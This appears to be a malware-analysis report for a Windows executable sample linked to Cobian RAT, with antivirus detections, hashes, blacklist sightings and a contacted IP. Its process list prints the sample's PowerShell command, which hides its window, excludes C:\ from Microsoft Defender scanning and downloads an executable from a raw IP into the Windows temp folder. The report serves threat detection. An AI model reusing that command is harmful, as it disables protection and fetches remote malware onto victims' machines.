bddf74962e855ed859e0ab4944c1c4242024557d9e160cdd523010245152f83a

Classification: Malicious

bddf74962e855ed859e0ab4944c1c4242024557d9e160cdd523010245152f83a is a malicious file sample. Linked to Cobian Rat malware. Detected by 27 antivirus engines.

Detection summary

  • 27 antivirus detections
  • 1 IDS alerts
  • 2 processes observed
  • 1 contacted hosts
  • 0 DNS requests

MITRE ATT&CK associations

Malware families: COBIAN RAT (S0338)

Blacklist sightings

Description Source First seen Last seen Labels MITRE ATT&CK
Generic Malware Hybrid-Analysis 2025-08-19 10:15:07 2025-08-19 11:15:23
Cobian RAT ThreatFox Abuse.ch 2024-05-30 14:52:55 2024-06-01 14:19:56 S0338 Cobian RAT

Tags

win.cobian_rat

Sample information

Filenames
bddf74962e855ed859e0ab4944c1c4242024557d9e160cdd523010245152f83a
File type
PE32 executable for MS Windows 6.00 (GUI), Intel i ...
Size
7680 bytes
MD5
7a70779d9d7de5e370fac0fa2d4ccd13
SHA-1
c5b31825bfd74ca0eb5150b73aaccc22c49bb392
SHA-256
bddf74962e855ed859e0ab4944c1c4242024557d9e160cdd523010245152f83a
First indexed
2024-05-30 15:18:35
Last updated
2026-04-03 09:33:49

Antivirus detections

EngineDetection
Antiy-AVLTrojan/MSIL.Pits
BitDefenderThetaGen:NN.ZemsilF.36806.am0@aSvWIsm
BkavW32.AIDetectMalware.CS
DeepInstinctMALICIOUS
FortinetPossibleThreat
GoogleDetected
IkarusTrojan-Downloader.MSIL.Agent
KasperskyHEUR:Trojan.MSIL.Pits.gen
KingsoftMSIL.Trojan.Pits.gen
LionicTrojan.Win32.Pits.4!c
MalwarebytesGeneric.Malware/Suspicious
MaxSecureTrojan.Malware.109353662.susgen
McAfeeArtemis!7A70779D9D7D
McAfeeDti!BDDF74962E85
MicrosoftTrojan:Win32/Sabsik.FL.B!ml
Paloaltogeneric.ml
PandaTrj/Chgt.AD
RisingTrojan.Pits!8.10D50 (CLOUD)
SangforTrojan.Win32.Pits.Vna2
SentinelOneStatic AI - Suspicious PE
SkyhighArtemis!Trojan
SophosMal/Generic-S
SymantecML.Attribute.HighConfidence
VBA32TScope.Trojan.MSIL
VaristW32/ABRisk.LUFM-5565
ZoneAlarmHEUR:Trojan.MSIL.Pits.gen
alibabacloudTrojan

Network contacts

49.13.194.118

Process list

NameCommand line
bddf74962e855ed859e0ab4944c1c4242024557d9e160cdd523010245152f83a.exe
powershell.exe-Command "WindowStyle -HiddenAdd-MpPreference -ExclusionPath 'C:\' -Force[Net.ServicePointManager]::SecurityProtocol = 'Tls, Tls11, Tls12, Ssl3'$DownloadUrl = 'http://49.13.194.118/ADServices.exe'$WebResponse = Invoke-WebRequest -Uri $DownloadUrl -Method HeadWrite-Output 'Downloading $DownloadUrl'Start-BitsTransfer -Source $WebResponse.BaseResponse.ResponseUri.AbsoluteUri.Replace('%20', ' ') -Destination 'C:\\Windows\\Temp\\'"